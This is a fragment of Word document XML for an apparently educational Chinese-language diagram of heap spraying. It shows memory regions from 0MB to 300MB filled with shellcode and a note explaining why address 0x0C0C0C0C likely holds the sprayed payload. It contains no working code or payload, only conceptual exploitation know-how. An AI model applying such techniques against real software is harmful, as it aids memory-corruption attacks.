                                </w:rPr>
                                <w:t>300MB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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="701300" y="758129"/>
                            <a:ext cx="856615" cy="305435"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1D4450BF" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>已使用内存</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矩形 202"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="282835" y="796432"/>
                            <a:ext cx="418827" cy="229933"/>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383FE53B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00747D3A"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3433888" y="134357"/>
                            <a:ext cx="1567811" cy="551443"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="587DCB80" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00734F5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3432997" y="1941850"/>
                            <a:ext cx="1563429" cy="153090"/>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08CC0109" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="004C22B0"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文本框 205"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="219387" y="127861"/>
                            <a:ext cx="2553970" cy="431165"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="49461270" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00962DDC" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:rPr>
                                  <w:sz w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                  <w:sz w:val="28"/>
                                </w:rPr>
                                <w:t>堆喷洒（Heap</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="28"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> Spraying</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                  <w:sz w:val="28"/>
                                </w:rPr>
                                <w:t>）之后</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6" name="矩形 206"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3433675" y="2420407"/>
                            <a:ext cx="1563583" cy="99947"/>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0C224A03" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00A47BED"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3433675" y="2289583"/>
                            <a:ext cx="1563583" cy="126398"/>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70777035" w14:textId="77777777" w:rsidR="002C1A8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矩形 208"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3433888" y="2201715"/>
                            <a:ext cx="1563370" cy="99695"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1661B500" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>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矩形 209"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3433675" y="2095136"/>
                            <a:ext cx="1563370" cy="126365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="10F12625" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>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282835" y="1180228"/>
                            <a:ext cx="418465" cy="229870"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="55021535" w14:textId="77777777" w:rsidR="002C1A8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矩形 211"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3430078" y="685780"/>
                            <a:ext cx="1567180" cy="1255977"/>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7D47EAD7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="center"/>
                              </w:pPr>
                              <w:r>
                                <w:t>s</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>hellcode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矩形 212"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="282835" y="1579963"/>
                            <a:ext cx="418465" cy="22923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3CACD369" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="2583643"/>
                            <a:ext cx="3338195" cy="683260"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="57F82613" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>地址</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>0</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>x0C0C0C0C</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>已经包含</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>Shellcode</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>的可能性非常高</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="65D997E4" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>2</w:t>
                              </w:r>
                              <w:r>
                                <w:t>00×1024×1024=0x0C800000</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>＞0</w:t>
                              </w:r>
                              <w:r>
                                <w:t>x0C0C0C0C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连接符: 肘形 214"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="5400000" flipH="1" flipV="1">
                            <a:off x="2020307" y="1174492"/>
                            <a:ext cx="1270652" cy="154889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25AE0B5" id="画布 237" o:spid="_x0000_s1127" editas="canvas" style="width:415.3pt;height:257.8pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="52743,3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&#10;">
                <v:shape id="_x0000_s1128" type="#_x0000_t75" style="position:absolute;width:52743;height:32734;visibility:visible;mso-wrap-style:square">
                  <v:fill o:detectmouseclick="t"/>
                  <v:path o:connecttype="none"/>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1129" type="#_x0000_t202" style="position:absolute;left:7016;top:15440;width:69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x71wwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCN7qRqU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qd8e9cMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="1A9C6516" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>s</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman"/>
                          </w:rPr>
                          <w:t>hellcode</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1130" type="#_x0000_t202" style="position:absolute;left:7016;top:11648;width:7233;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CCwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlhN7MRguSRFcRQcihPTS19DpkxySYnY27q8Z/3y0UepvH+5zNbjS9uJPznWUFiyQFQVxb&#10;3XGj4PR5nGcgfEDW2FsmBU/ysNtOJxsstH3wB92r0IgYwr5ABW0IQyGlr1sy6BM7EEfubJ3BEKFr&#10;pHb4iOGml8s0XUmDHceGFgc6tFRfqptR8H7Iq6xcPt13/loeq+y6sG/Zl1Ivs3G/BhFoDP/iP3ep&#10;4/x8Bb/PxAvk9gcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBZDYCCwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="06BD166A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>空闲内存</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1131" type="#_x0000_t202" style="position:absolute;left:29075;top:23505;width:4636;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UZwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCN7qRoU2SV1FBCEHPTQqvQ7ZaRKanY27q8Z/7xYKvc3jfc5yPZhO3Mj51rKC2TQBQVxZ&#10;3XKt4HTcvaYgfEDW2FkmBQ/ysF6NXpaYa3vnT7qVoRYxhH2OCpoQ+lxKXzVk0E9tTxy5b+sMhghd&#10;LbXDeww3nZwnyZs02HJsaLCnbUPVT3k1Cg7brEyL+cN9ZYtiV6aXmd2nZ6Um42HzASLQEP7Ff+5C&#10;x/nZO/w+Ey+QqycAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEANkElGcMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="021BE891" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>0MB</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1132" type="#_x0000_t202" style="position:absolute;left:27776;top:15444;width:5969;height:3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14:paraId="6B259E58" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>100MB</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1133" type="#_x0000_t202" style="position:absolute;left:27776;top:8630;width:596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TwwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0v+B/CCN7WVIWlrUYRQehh97B1F69DM7bFZlKTrNZ/vxEEb/N4n7PaDKYTV3K+taxgNk1AEFdW&#10;t1wr+Dns31MQPiBr7CyTgjt52KxHbyvMtb3xN13LUIsYwj5HBU0IfS6lrxoy6Ke2J47cyTqDIUJX&#10;S+3wFsNNJ+dJ8iENthwbGuxp11B1Lv+Mgq9dVqbF/O6O2aLYl+llZj/TX6Um42G7BBFoCC/x013o&#10;OD/L4PFMvECu/wEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAokhTwwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="1AC0DB85" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>200MB</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1134" type="#_x0000_t202" style="position:absolute;left:27785;top:2759;width:596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0mWwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvwv6H8IS9aaoLUrtGEUHowT1Ylb0+mmdbbF66SdT67zeC4HGYmW+Yxao3rbiR841lBZNxAoK4&#10;tLrhSsHxsB2lIHxA1thaJgUP8rBafgwWmGl75z3dilCJCGGfoYI6hC6T0pc1GfRj2xFH72ydwRCl&#10;q6R2eI9w08ppksykwYbjQo0dbWoqL8XVKPjZzIs0nz7c7/wr3xbp38Tu0pNSn8N+/Q0iUB/e4Vc7&#10;1woiEZ5n4hGQy38AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAiodJlsMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="15A7D1B0" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>300MB</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1135" type="#_x0000_t202" style="position:absolute;left:7013;top:7581;width:8566;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NxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BasMw&#10;EETvgf6D2EJuiWwHiuNGMcUQ8CE51G3pdbG2tqm1ciUlcf4+KhR6HGbmDbMrZzOKCzk/WFaQrhMQ&#10;xK3VA3cK3t8OqxyED8gaR8uk4EYeyv3DYoeFtld+pUsTOhEh7AtU0IcwFVL6tieDfm0n4uh9WWcw&#10;ROk6qR1eI9yMMkuSJ2lw4LjQ40RVT+13czYKTtW2yevs5j63m/rQ5D+pPeYfSi0f55dnEIHm8B/+&#10;a9daQZak8HsmHgG5vwMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDly+wNxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
